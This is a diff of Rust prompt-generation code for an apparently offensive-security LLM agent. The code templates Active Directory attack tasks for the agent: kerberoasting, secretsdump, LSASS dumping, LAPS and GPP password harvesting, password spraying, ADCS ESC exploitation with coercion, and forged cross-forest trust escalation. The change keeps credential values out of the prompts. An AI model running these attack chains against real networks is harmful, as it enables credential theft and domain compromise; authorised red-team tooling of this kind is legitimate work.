( "gpp_password_finder", format!( - "gpp_password_finder(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "gpp_password_finder(target='{dc_ip}', username='{username}', domain='{domain}') \ - ~2 seconds, finds GPP/cpassword credentials" ), ), ( "ldap_search_descriptions", format!( - "ldap_search_descriptions(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "ldap_search_descriptions(target='{dc_ip}', username='{username}', domain='{domain}') \ - finds passwords in LDAP description fields" ), ), ( "kerberoast", format!( - "kerberoast(domain='{domain}', username='{username}', \ - {cred_param}, dc_ip='{dc_ip}') \ + "kerberoast(domain='{domain}', username='{username}', dc_ip='{dc_ip}') \ - service account hashes (uses correct DC for the domain)" ), ), ( "secretsdump", format!( - "secretsdump(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "secretsdump(target='{dc_ip}', username='{username}', domain='{domain}') \ - dump hashes (requires admin)" ), ), ( "lsassy", format!( - "lsassy(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "lsassy(target='{dc_ip}', username='{username}', domain='{domain}') \ - LSASS memory dump" ), ), ( "laps_dump", format!( - "laps_dump(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "laps_dump(target='{dc_ip}', username='{username}', domain='{domain}') \ - LAPS local admin passwords" ), ), @@ -107,7 +106,7 @@ pub(super) fn try_generate_with_creds( } let targets_display = if p.targets.is_empty() { - "N/A".to_string() + "(none)".to_string() } else { p.targets.join(", ") }; @@ -117,14 +116,18 @@ pub(super) fn try_generate_with_creds( ctx.insert("domain", domain); ctx.insert( "dc_ip_display", - if dc_ip.is_empty() { "N/A" } else { dc_ip }, + if dc_ip.is_empty() { "(unset)" } else { dc_ip }, ); ctx.insert("targets_display", &targets_display); ctx.insert( "user_display", - if username.is_empty() { "N/A" } else { username }, + if username.is_empty() { + "(unset)" + } else { + username + }, ); - ctx.insert("cred_display", &cred_display); + ctx.insert("cred_capability", cred_capability); ctx.insert("instructions_text", &instructions.join("\n")); insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); @@ -147,7 +150,7 @@ pub(super) fn generate_fallback( "password" } else if p.has_hash { if p.hash_is_pth { - "hash" + "nthash" } else { "hash (non-NTLM)" } @@ -160,11 +163,6 @@ pub(super) fn generate_fallback( } else { "" }; - let cred_value = if p.has_password { - p.password - } else { - p.hash_value.unwrap_or("N/A") - }; let source = payload .get("credential_source") .and_then(|v| v.as_str()) @@ -179,7 +177,7 @@ pub(super) fn generate_fallback( p.techniques.join(", ") }; let targets_display = if p.targets.is_empty() { - "N/A".to_string() + "(none)".to_string() } else { p.targets.join(", ") }; @@ -190,18 +188,17 @@ pub(super) fn generate_fallback( ctx.insert("targets_display", &targets_display); ctx.insert( "dc_ip_display", - if dc_ip.is_empty() { "N/A" } else { dc_ip }, + if dc_ip.is_empty() { "(unset)" } else { dc_ip }, ); ctx.insert( "user_display", if p.username.is_empty() { - "N/A" + "(unset)" } else { p.username }, ); ctx.insert("cred_type", cred_type); - ctx.insert("cred_value", cred_value); ctx.insert("techniques_display", &techniques_display); if !hash_type.is_empty() { ctx.insert("hash_type", hash_type); diff --git a/ares-llm/src/prompt/credential_access/low_hanging.rs b/ares-llm/src/prompt/credential_access/low_hanging.rs index 17a71d63..0a535b32 100644 --- a/ares-llm/src/prompt/credential_access/low_hanging.rs +++ b/ares-llm/src/prompt/credential_access/low_hanging.rs @@ -55,6 +55,9 @@ pub(super) fn generate_without_creds( "dc_ip_display", if dc_ip.is_empty() { "N/A" } else { dc_ip }, ); + if !p.excluded_users.is_empty() { + ctx.insert("excluded_users", p.excluded_users); + } insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); render_template_with_context(TASK_CREDACCESS_LOW_HANGING_NO_CREDS, &ctx) diff --git a/ares-llm/src/prompt/credential_access/mod.rs b/ares-llm/src/prompt/credential_access/mod.rs index 4f38267c..c068268c 100644 --- a/ares-llm/src/prompt/credential_access/mod.rs +++ b/ares-llm/src/prompt/credential_access/mod.rs @@ -34,6 +34,11 @@ pub(crate) struct Params<'a> { pub has_password: bool, pub has_hash: bool, pub has_creds: bool, + /// Comma-separated list of usernames that are quarantined (locked out) + /// in this domain. The orchestrator extracts these from prior lockout + /// observations and passes them through so spray prompts instruct the + /// LLM to skip them and the worker tool drops them from the wordlist. + pub excluded_users: &'a str, } pub(crate) fn generate_credential_access_prompt( @@ -73,9 +78,23 @@ pub(crate) fn generate_credential_access_prompt( .or_else(|| payload.get("target_ip")) .and_then(|v| v.as_str()) .unwrap_or(""); - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - // Read from nested "credential" object first (dispatchers nest it), flat fallback + // Read from nested "credential" object first (dispatchers nest it), flat fallback. + // Domain falls back to `credential.domain` so secretsdump dispatches that + // only nest the auth realm (request_secretsdump / request_secretsdump_hash) + // still surface a real domain in the prompt. Without this fallback the + // template emits `domain=''`, the LLM faithfully calls the tool with an + // empty realm, and downstream auth fails STATUS_LOGON_FAILURE. let cred_obj = payload.get("credential"); + let domain = payload + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + .or_else(|| { + cred_obj + .and_then(|c| c.get("domain")) + .and_then(|v| v.as_str()) + }) + .unwrap_or(""); let username = cred_obj .and_then(|c| c.get("username")) .and_then(|v| v.as_str()) @@ -87,6 +106,10 @@ pub(crate) fn generate_credential_access_prompt( .or_else(|| payload.get("password").and_then(|v| v.as_str())) .unwrap_or(""); let reason = payload.get("reason").and_then(|v| v.as_str()).unwrap_or(""); + let excluded_users = payload + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap_or(""); let ticket_path = payload.get("ticket_path").and_then(|v| v.as_str()); let no_pass = payload @@ -112,6 +135,7 @@ pub(crate) fn generate_credential_access_prompt( has_password, has_hash, has_creds, + excluded_users, }; // Branch 1: Kerberos ticket-based secretsdump diff --git a/ares-llm/src/prompt/credential_access/spray.rs b/ares-llm/src/prompt/credential_access/spray.rs index 5fdf6edf..b4c92473 100644 --- a/ares-llm/src/prompt/credential_access/spray.rs +++ b/ares-llm/src/prompt/credential_access/spray.rs @@ -50,6 +50,9 @@ pub(super) fn try_generate( if !cred_line.is_empty() { ctx.insert("cred_line", &cred_line); } + if !p.excluded_users.is_empty() { + ctx.insert("excluded_users", p.excluded_users); + } insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); Some(render_template_with_context(TASK_CREDACCESS_SPRAY, &ctx)) diff --git a/ares-llm/src/prompt/exploit/adcs.rs b/ares-llm/src/prompt/exploit/adcs.rs index 02b377dd..2c9b4ef5 100644 --- a/ares-llm/src/prompt/exploit/adcs.rs +++ b/ares-llm/src/prompt/exploit/adcs.rs @@ -42,7 +42,7 @@ pub(crate) fn generate_adcs_enumerate_prompt( render_template_with_context(TASK_EXPLOIT_ADCS_ENUMERATE, &ctx) } -/// Generate prompt for ADCS ESC1/ESC4/ESC8 exploitation tasks. +/// Generate prompt for ADCS ESC exploitation tasks. pub(crate) fn generate_adcs_esc_prompt( task_id: &str, payload: &Value, @@ -51,22 +51,72 @@ pub(crate) fn generate_adcs_esc_prompt( domain: &str, vuln_type: &str, ) -> anyhow::Result { + // CA server: try ca_server, ca_host, target_ip, then fall back to target let ca_server = payload .get("ca_server") + .or_else(|| payload.get("ca_host")) + .or_else(|| payload.get("target_ip")) .and_then(|v| v.as_str()) .unwrap_or(target); + let ca_name = payload + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or(""); let template = payload .get("template") .and_then(|v| v.as_str()) .unwrap_or(""); + let username = payload + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let password = payload + .get("password") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dc_ip = payload.get("dc_ip").and_then(|v| v.as_str()).unwrap_or(""); + let admin_sid = payload + .get("admin_sid") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let instructions = payload + .get("instructions") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_target = payload + .get("coerce_target") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_targets: Vec = payload + .get("coerce_targets") + .and_then(|v| v.as_array()) + .map(|arr| { + arr.iter() + .filter_map(|v| v.as_str().map(String::from)) + .collect() + }) + .unwrap_or_default(); + let listener_ip = payload + .get("listener_ip") + .and_then(|v| v.as_str()) + .unwrap_or(""); let vt_lower = vuln_type.to_lowercase(); let mut ctx = Context::new(); ctx.insert("task_id", task_id); ctx.insert("ca_server", ca_server); + ctx.insert("ca_name", ca_name); ctx.insert("template", template); ctx.insert("domain", domain); + ctx.insert("username", username); + ctx.insert("password", password); + ctx.insert("dc_ip", dc_ip); + ctx.insert("admin_sid", admin_sid); + ctx.insert("instructions", instructions); + ctx.insert("coerce_target", coerce_target); + ctx.insert("coerce_targets", &coerce_targets); + ctx.insert("listener_ip", listener_ip); ctx.insert("vuln_upper", &vuln_type.to_uppercase()); ctx.insert("is_esc8", &vt_lower.contains("esc8")); insert_state_context(&mut ctx, state, "exploit", Some(target)); diff --git a/ares-llm/src/prompt/exploit/mod.rs b/ares-llm/src/prompt/exploit/mod.rs index bbc554d7..ab5de3df 100644 --- a/ares-llm/src/prompt/exploit/mod.rs +++ b/ares-llm/src/prompt/exploit/mod.rs @@ -87,9 +87,9 @@ pub(crate) fn generate_exploit_prompt( ); } - // ADCS ESC1 / ESC4 / ESC8 + // ADCS ESC exploitation (all ESC types) let vt_lower = vuln_type.to_lowercase(); - if vt_lower.contains("esc1") || vt_lower.contains("esc4") || vt_lower.contains("esc8") { + if vt_lower.contains("esc") { return adcs::generate_adcs_esc_prompt(task_id, payload, state, target, domain, vuln_type); } diff --git a/ares-llm/src/prompt/exploit/trust.rs b/ares-llm/src/prompt/exploit/trust.rs index 245f9ed9..13203221 100644 --- a/ares-llm/src/prompt/exploit/trust.rs +++ b/ares-llm/src/prompt/exploit/trust.rs @@ -1,4 +1,10 @@ //! Trust key extraction and cross-forest exploitation prompt generation. +//! +//! NOTE: This generator MUST NOT inject credential values into the rendered +//! prompt. Source-domain DA password/hash, trust keys, child krbtgt hashes, +//! and SIDs all live in operation state and are auto-resolved by the worker +//! at dispatch time. The template only sees principal-only fields and +//! capability flags (`has_source_da`, `has_trust_key`, `has_child_krbtgt`). use serde_json::Value; use tera::Context; @@ -28,10 +34,16 @@ pub(crate) fn generate_trust_key_prompt( .get("username") .and_then(|v| v.as_str()) .unwrap_or("Administrator"); - let password = payload + let payload_password_present = payload .get("password") .and_then(|v| v.as_str()) - .unwrap_or(""); + .map(|s| !s.is_empty()) + .unwrap_or(false); + let payload_admin_hash_present = payload + .get("admin_hash") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); let dc_ip = payload .get("dc_ip") .and_then(|v| v.as_str()) @@ -44,25 +56,16 @@ pub(crate) fn generate_trust_key_prompt( .get("target_sid") .and_then(|v| v.as_str()) .unwrap_or(""); - let trust_key = payload + let trust_key_present = payload .get("trust_key") .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Look up password from state if not in payload - let password = if password.is_empty() { - if let Some(s) = state { - s.credentials - .iter() - .find(|c| c.username.eq_ignore_ascii_case(username) && !c.password.is_empty()) - .map(|c| c.password.as_str()) - .unwrap_or("") - } else { - "" - } - } else { - password - }; + .map(|s| !s.is_empty()) + .unwrap_or(false); + let child_krbtgt_in_payload = payload + .get("child_krbtgt_hash") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); // Determine if this is a child-to-parent escalation (same forest). let vuln_type = payload @@ -75,11 +78,54 @@ pub(crate) fn generate_trust_key_prompt( .to_lowercase() .ends_with(&format!(".{}", trusted_domain.to_lowercase()))); - let has_trust_key = !trust_key.is_empty(); + // Source DA availability — we have a usable creator credential if either + // the payload carried one OR state has a credential/hash for the principal + // in the source domain. The values themselves are never inserted into ctx. + let state_has_password = state + .map(|s| { + s.credentials.iter().any(|c| { + c.username.eq_ignore_ascii_case(username) + && c.domain.eq_ignore_ascii_case(domain) + && !c.password.is_empty() + }) + }) + .unwrap_or(false); + let state_has_hash = state + .map(|s| { + s.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && !h.hash_value.is_empty() + }) + }) + .unwrap_or(false); + let has_source_da = payload_password_present + || payload_admin_hash_present + || state_has_password + || state_has_hash; + + let source_auth = if payload_password_present || state_has_password { + "password" + } else if payload_admin_hash_present || state_has_hash { + "nthash" + } else { + "missing" + }; + + let has_trust_key = trust_key_present + || state + .map(|s| { + s.hashes.iter().any(|h| { + h.username + .to_uppercase() + .ends_with(&format!("{}$", trusted_domain_short(trusted_domain))) + && h.domain.eq_ignore_ascii_case(domain) + }) + }) + .unwrap_or(false); let needs_source_sid = source_sid.is_empty(); let needs_target_sid = target_sid.is_empty(); - // Compute dynamic step numbers let mut step = 1u32; let step_extract = step; if !has_trust_key { @@ -106,17 +152,30 @@ pub(crate) fn generate_trust_key_prompt( .and_then(|v| v.as_str()) .unwrap_or(dc_ip); - let trust_key_or_placeholder = if has_trust_key { - trust_key + let target_dc_hostname = if let Some(s) = state { + s.hosts + .iter() + .find(|h| h.ip == target_dc_hint && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + h.is_dc + && h.hostname + .to_lowercase() + .ends_with(&format!(".{}", trusted_domain.to_lowercase())) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_default() } else { - "" + String::new() }; - let trust_key_val = if has_trust_key { - trust_key - } else { - "" - }; + // SIDs are non-secret — they CAN be inserted (they identify the domain, + // not authenticate it). Empty values become an explicit placeholder so the + // template branch communicates "not yet known". let source_sid_val = if source_sid.is_empty() { "" } else { @@ -133,11 +192,18 @@ pub(crate) fn generate_trust_key_prompt( target_sid }; - // Admin hash for hash-based raiseChild auth (used when password is empty) - let admin_hash = payload - .get("admin_hash") - .and_then(|v| v.as_str()) - .unwrap_or(""); + // child krbtgt: only need a flag, not the value. + let has_child_krbtgt = child_krbtgt_in_payload + || (is_child_to_parent + && state + .map(|s| { + s.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.eq_ignore_ascii_case(domain) + && h.hash_type.eq_ignore_ascii_case("NTLM") + }) + }) + .unwrap_or(false)); let mut ctx = Context::new(); ctx.insert("task_id", task_id); @@ -145,20 +211,19 @@ pub(crate) fn generate_trust_key_prompt( ctx.insert("trusted_domain", trusted_domain); ctx.insert("dc_ip", dc_ip); ctx.insert("username", username); - ctx.insert("password", password); + ctx.insert("source_auth", source_auth); + ctx.insert("has_source_da", &has_source_da); ctx.insert("has_trust_key", &has_trust_key); - ctx.insert("trust_key", trust_key); ctx.insert("needs_source_sid", &needs_source_sid); ctx.insert("needs_target_sid", &needs_target_sid); ctx.insert("is_child_to_parent", &is_child_to_parent); ctx.insert("trusted_domain_prefix", &trusted_domain_prefix); ctx.insert("target_dc_hint", target_dc_hint); - ctx.insert("trust_key_or_placeholder", trust_key_or_placeholder); - ctx.insert("trust_key_val", trust_key_val); + ctx.insert("target_dc_hostname", &target_dc_hostname); ctx.insert("source_sid_val", source_sid_val); ctx.insert("target_sid_val", target_sid_val); ctx.insert("extra_sid_val", extra_sid_val); - ctx.insert("admin_hash", admin_hash); + ctx.insert("has_child_krbtgt", &has_child_krbtgt); ctx.insert("step_extract", &step_extract); ctx.insert("step_sid", &step_sid); ctx.insert("step_forge", &step_forge); @@ -168,3 +233,11 @@ pub(crate) fn generate_trust_key_prompt( render_template_with_context(TASK_EXPLOIT_TRUST, &ctx) } + +fn trusted_domain_short(trusted_domain: &str) -> String { + trusted_domain + .split('.') + .next() + .unwrap_or(trusted_domain) + .to_uppercase() +} diff --git a/ares-llm/src/prompt/helpers.rs b/ares-llm/src/prompt/helpers.rs index 532df40f..d941c521 100644 --- a/ares-llm/src/prompt/helpers.rs +++ b/ares-llm/src/prompt/helpers.rs @@ -1,4 +1,10 @@ //! Shared helpers for prompt generation. +//! +//! These helpers MUST NOT emit credential values (passwords, hashes, AES keys, +//! ticket bytes) into prompts. The worker resolves credentials from operation +//! state at dispatch time; the LLM only ever sees principals (username/domain) +//! and capability labels ("password", "nthash", "aes256", "ticket"). See +//! `ares-cli/src/worker/credential_resolver.rs` for the resolution path. use serde_json::Value; use tera::Context; @@ -6,7 +12,11 @@ use tera::Context; use super::state_context::format_state_context; use super::StateSnapshot; -/// Extract credential fields from payload into a Tera context. +/// Insert principal-only credential context into a Tera context. +/// Surfaces `credential_username`, `credential_domain`, `credential_auth_type` +/// — never the raw password/hash. Templates that need to brand "we have creds" +/// vs "we don't" can branch on `credential_username` presence; templates that +/// need to brand the auth type can branch on `credential_auth_type`. pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { if let Some(cred) = payload.get("credential") { let user = cred["username"].as_str().unwrap_or(""); @@ -15,13 +25,13 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ctx.insert("credential_username", user); ctx.insert("credential_domain", cred_domain); - let password = cred.get("password").and_then(|v| v.as_str()).unwrap_or(""); - let has_password = !password.is_empty(); - if has_password { - ctx.insert("credential_password", password); - } + let has_password = cred + .get("password") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); ctx.insert( - "auth_type", + "credential_auth_type", if has_password { "password" } else { @@ -30,6 +40,12 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ); } } + // Surface bind_domain so templates can instruct the LLM to use it + if let Some(bd) = payload.get("bind_domain").and_then(|v| v.as_str()) { + if !bd.is_empty() { + ctx.insert("bind_domain", bd); + } + } } /// Insert formatted state context into a Tera context. @@ -83,10 +99,12 @@ pub(crate) fn payload_techniques(payload: &Value) -> Vec { .unwrap_or_default() } -/// Extract password from payload — checks nested `credential.password` first, -/// then flat top-level `password` (matches both dispatcher shapes). -fn extract_password(payload: &Value) -> Option<&str> { - payload +/// Capability label for a payload's credential. +/// +/// Returns one of: `"password"`, `"nthash"`, `"none"`. The label is **non-secret** +/// — it tells the LLM what auth class will be auto-resolved, not the value. +pub(crate) fn cred_capability_label(payload: &Value, hash_value: Option<&str>) -> &'static str { + let has_password = payload .get("credential") .and_then(|c| c.get("password")) .and_then(|v| v.as_str()) @@ -97,28 +115,14 @@ fn extract_password(payload: &Value) -> Option<&str> { .and_then(|v| v.as_str()) .filter(|s| !s.is_empty()) }) -} - -/// Build the credential parameter string for technique call sites. -pub(crate) fn cred_param_str(payload: &Value, hash_value: Option<&str>) -> String { - if let Some(pw) = extract_password(payload) { - return format!("password='{pw}'"); - } - if let Some(h) = hash_value { - return format!("hashes='{h}'"); - } - "password='N/A'".to_string() -} - -/// Build the credential display string. -pub(crate) fn cred_display_str(payload: &Value, hash_value: Option<&str>) -> String { - if let Some(pw) = extract_password(payload) { - return pw.to_string(); - } - if let Some(h) = hash_value { - return format!("[HASH] {h}"); + .is_some(); + if has_password { + "password" + } else if hash_value.is_some() { + "nthash" + } else { + "none" } - "N/A".to_string() } #[cfg(test)] @@ -164,7 +168,6 @@ mod tests { #[test] fn pth_compat_lm_empty_nt_valid() { - // Empty LM part with valid NT assert!(is_pass_the_hash_compatible(Some( ":313b6f423a71d74c0a1b8a2f43b22d4c" ))); @@ -192,79 +195,43 @@ mod tests { } #[test] - fn cred_param_str_password() { - let payload = json!({"password": "P@ss1"}); - assert_eq!(cred_param_str(&payload, None), "password='P@ss1'"); + fn cred_capability_password() { + let payload = json!({"password": "secret"}); + assert_eq!(cred_capability_label(&payload, None), "password"); } #[test] - fn cred_param_str_nested_password() { - let payload = json!({"credential": {"username": "admin", "domain": "contoso.local", "password": "Summer2025"}}); - assert_eq!(cred_param_str(&payload, None), "password='Summer2025'"); + fn cred_capability_nested_password() { + let payload = json!({"credential": {"password": "secret"}}); + assert_eq!(cred_capability_label(&payload, None), "password"); } #[test] - fn cred_param_str_nested_takes_precedence() { - let payload = json!({"password": "flat", "credential": {"password": "nested"}}); - assert_eq!(cred_param_str(&payload, None), "password='nested'"); - } - - #[test] - fn cred_param_str_hash() { + fn cred_capability_hash_only() { let payload = json!({}); - assert_eq!( - cred_param_str(&payload, Some("aabbccdd")), - "hashes='aabbccdd'" - ); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "nthash"); } #[test] - fn cred_param_str_fallback() { + fn cred_capability_none() { let payload = json!({}); - assert_eq!(cred_param_str(&payload, None), "password='N/A'"); + assert_eq!(cred_capability_label(&payload, None), "none"); } #[test] - fn cred_param_str_empty_password_uses_hash() { - let payload = json!({"password": ""}); - assert_eq!(cred_param_str(&payload, Some("aabb")), "hashes='aabb'"); - } - - #[test] - fn cred_param_str_nested_empty_uses_hash() { - let payload = json!({"credential": {"password": ""}}); - assert_eq!(cred_param_str(&payload, Some("aabb")), "hashes='aabb'"); - } - - #[test] - fn cred_display_str_password() { - let payload = json!({"password": "Secret123"}); - assert_eq!(cred_display_str(&payload, None), "Secret123"); - } - - #[test] - fn cred_display_str_nested_password() { - let payload = json!({"credential": {"password": "Summer2025"}}); - assert_eq!(cred_display_str(&payload, None), "Summer2025"); + fn cred_capability_password_takes_precedence() { + let payload = json!({"password": "secret"}); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "password"); } #[test] - fn cred_display_str_hash() { - let payload = json!({}); - assert_eq!( - cred_display_str(&payload, Some("aabbccdd")), - "[HASH] aabbccdd" - ); - } - - #[test] - fn cred_display_str_fallback() { - let payload = json!({}); - assert_eq!(cred_display_str(&payload, None), "N/A"); + fn cred_capability_empty_password_falls_back_to_hash() { + let payload = json!({"password": ""}); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "nthash"); } #[test] - fn insert_credential_context_with_password() { + fn insert_credential_context_with_password_does_not_leak_value() { let payload = json!({ "credential": { "username": "admin", @@ -277,8 +244,11 @@ mod tests { let json = ctx.into_json(); assert_eq!(json["credential_username"], "admin"); assert_eq!(json["credential_domain"], "contoso.local"); - assert_eq!(json["credential_password"], "P@ss1"); - assert_eq!(json["auth_type"], "password"); + assert_eq!(json["credential_auth_type"], "password"); + assert!( + json.get("credential_password").is_none(), + "credential_password must never be exposed to templates" + ); } #[test] @@ -292,7 +262,8 @@ mod tests { let mut ctx = Context::new(); insert_credential_context(&mut ctx, &payload); let json = ctx.into_json(); - assert_eq!(json["auth_type"], "hash/ticket"); + assert_eq!(json["credential_auth_type"], "hash/ticket"); + assert!(json.get("credential_password").is_none()); } #[test] @@ -302,5 +273,6 @@ mod tests { insert_credential_context(&mut ctx, &payload); let json = ctx.into_json(); assert!(json.get("credential_username").is_none()); + assert!(json.get("credential_password").is_none()); } } diff --git a/ares-llm/src/prompt/mod.rs b/ares-llm/src/prompt/mod.rs index d7528eda..8ea50c9e 100644 --- a/ares-llm/src/prompt/mod.rs +++ b/ares-llm/src/prompt/mod.rs @@ -75,6 +75,7 @@ pub fn generate_task_prompt( privesc::generate_privesc_enumeration_prompt(task_id, payload, state) } "acl_analysis" => acl::generate_acl_analysis_prompt(task_id, payload, state), + "acl_chain_step" => acl::generate_acl_chain_step_prompt(task_id, payload, state), "command" => command::generate_command_prompt(task_id, payload), _ => return None, }; diff --git a/ares-llm/src/prompt/recon.rs b/ares-llm/src/prompt/recon.rs index 8c098d09..443c6c9a 100644 --- a/ares-llm/src/prompt/recon.rs +++ b/ares-llm/src/prompt/recon.rs @@ -34,6 +34,28 @@ pub(crate) fn generate_recon_prompt( ctx.insert("techniques", &techniques); } + // Single technique (e.g. certipy_find, ldap_group_enumeration) + if let Some(technique) = payload["technique"].as_str() { + ctx.insert("technique", technique); + } + + // Task-specific instructions (e.g. certipy commands, LDAP queries) + if let Some(instructions) = payload["instructions"].as_str() { + ctx.insert("instructions", instructions); + } + + // Surface the principal that owns a usable NTLM hash so the LLM can + // reference it by name. The hash value itself is never inserted — the + // worker injects the hash at dispatch from operation state. + if let Some(hash_username) = payload["hash_username"].as_str() { + if !hash_username.is_empty() { + ctx.insert("hash_username", hash_username); + ctx.insert("has_ntlm_hash", &true); + } + } else if payload["ntlm_hash"].as_str().is_some() { + ctx.insert("has_ntlm_hash", &true); + } + insert_state_context(&mut ctx, state, "recon", payload["target_ip"].as_str()); render_template_with_context(TASK_RECON, &ctx) diff --git a/ares-llm/src/prompt/templates.rs b/ares-llm/src/prompt/templates.rs index 51c369f1..bed029ef 100644 --- a/ares-llm/src/prompt/templates.rs +++ b/ares-llm/src/prompt/templates.rs @@ -45,6 +45,8 @@ const TASK_PRIVESC_ENUMERATION_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/privesc_enumeration.md.tera"); const TASK_ACL_ANALYSIS_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/acl_analysis.md.tera"); +const TASK_ACL_CHAIN_STEP_TEMPLATE: &str = + include_str!("../../templates/redteam/tasks/acl_chain_step.md.tera"); const TASK_COMMAND_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/command.md.tera"); const TASK_EXPLOIT_ADCS_ENUMERATE_TEMPLATE: &str = @@ -144,6 +146,7 @@ pub const TASK_LATERAL: &str = "redteam/tasks/lateral"; pub const TASK_COERCION: &str = "redteam/tasks/coercion"; pub const TASK_PRIVESC_ENUMERATION: &str = "redteam/tasks/privesc_enumeration"; pub const TASK_ACL_ANALYSIS: &str = "redteam/tasks/acl_analysis"; +pub const TASK_ACL_CHAIN_STEP: &str = "redteam/tasks/acl_chain_step"; pub const TASK_COMMAND: &str = "redteam/tasks/command"; // Exploit task templates @@ -231,6 +234,7 @@ static TEMPLATES: LazyLock = LazyLock::new(|| { (TASK_COERCION, TASK_COERCION_TEMPLATE), (TASK_PRIVESC_ENUMERATION, TASK_PRIVESC_ENUMERATION_TEMPLATE), (TASK_ACL_ANALYSIS, TASK_ACL_ANALYSIS_TEMPLATE), + (TASK_ACL_CHAIN_STEP, TASK_ACL_CHAIN_STEP_TEMPLATE), (TASK_COMMAND, TASK_COMMAND_TEMPLATE), // Exploit task templates ( @@ -371,9 +375,12 @@ pub fn render_agent_instructions_with_extras( /// - `all_capabilities`: map of role → tool list. Falls back to hardcoded defaults if None. /// - `technique_priorities`: sorted list of (technique, weight) pairs for the priority table. /// If provided, renders a dynamic "ATTACK FALLBACK CHAINS" section. +/// - `listener_ip`: orchestrator's relay/listener IP. Surfaced to the LLM so it +/// doesn't hallucinate a subnet-gateway IP for `listener_ip`/`attacker_ip` args. pub fn render_system_instructions( all_capabilities: Option<&HashMap>>, technique_priorities: Option<&[(String, i32)]>, + listener_ip: Option<&str>, ) -> Result { let mut ctx = Context::new(); if let Some(caps) = all_capabilities { @@ -382,6 +389,9 @@ pub fn render_system_instructions( if let Some(priorities) = technique_priorities { ctx.insert("technique_priorities", priorities); } + if let Some(ip) = listener_ip { + ctx.insert("listener_ip", ip); + } TEMPLATES .render(TEMPLATE_SYSTEM_INSTRUCTIONS, &ctx) @@ -517,14 +527,14 @@ mod tests { caps.insert("privesc".to_string(), vec!["certipy".to_string()]); caps.insert("lateral".to_string(), vec!["psexec".to_string()]); - let result = render_system_instructions(Some(&caps), None).unwrap(); + let result = render_system_instructions(Some(&caps), None, None).unwrap(); assert!(result.contains("RECON")); assert!(result.contains("nmap_scan")); } #[test] fn render_system_instructions_without_capabilities() { - let result = render_system_instructions(None, None).unwrap(); + let result = render_system_instructions(None, None, None).unwrap(); // Falls back to hardcoded defaults assert!(result.contains("nmap, netexec, rpcclient")); // Hardcoded fallback table @@ -541,7 +551,7 @@ mod tests { ("esc1".to_string(), 5), ("acl_abuse".to_string(), 6), ]; - let result = render_system_instructions(None, Some(&priorities)).unwrap(); + let result = render_system_instructions(None, Some(&priorities), None).unwrap(); // Dynamic table rendered assert!( result.contains("operator strategy"), @@ -557,6 +567,28 @@ mod tests { ); } + #[test] + fn render_system_instructions_with_listener_ip() { + let result = render_system_instructions(None, None, Some("192.168.58.178")).unwrap(); + assert!( + result.contains("192.168.58.178"), + "Listener IP should be substituted into prompt" + ); + assert!( + result.contains("OPERATOR INFRASTRUCTURE"), + "Listener IP section should render when value is provided" + ); + } + + #[test] + fn render_system_instructions_omits_listener_section_when_unset() { + let result = render_system_instructions(None, None, None).unwrap(); + assert!( + !result.contains("OPERATOR INFRASTRUCTURE"), + "Listener IP section should be hidden when no IP provided" + ); + } + #[test] fn render_initial_task() { let mut vars = HashMap::new(); diff --git a/ares-llm/src/prompt/tests.rs b/ares-llm/src/prompt/tests.rs index 793b101b..361e08ff 100644 --- a/ares-llm/src/prompt/tests.rs +++ b/ares-llm/src/prompt/tests.rs @@ -257,7 +257,13 @@ fn credaccess_low_hanging_fruit_with_creds() { assert!(prompt.contains("LOW HANGING FRUIT credential harvesting")); assert!(prompt.contains("gpp_password_finder")); assert!(prompt.contains("sysvol_script_search")); - assert!(prompt.contains("P@ss1")); + // Worker auto-resolves credentials at dispatch — the password value must + // never appear in the LLM-facing prompt. + assert!( + !prompt.contains("P@ss1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(prompt.contains("auto-resolved at dispatch")); } #[test] @@ -334,7 +340,14 @@ fn credaccess_technique_enforcement_with_creds() { assert!(prompt.contains("secretsdump(target=")); assert!(prompt.contains("kerberoast(domain=")); assert!(prompt.contains("laps_dump(target=")); - assert!(prompt.contains("P@ss1")); + // Password must never appear in LLM-facing prompts. The schema strip plus + // worker resolver inject the credential at dispatch. + assert!( + !prompt.contains("P@ss1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("password='")); + assert!(prompt.contains("Auth: password (auto-resolved at dispatch")); } #[test] @@ -348,7 +361,12 @@ fn credaccess_technique_enforcement_with_hash() { }); let prompt = generate_task_prompt("credential_access", 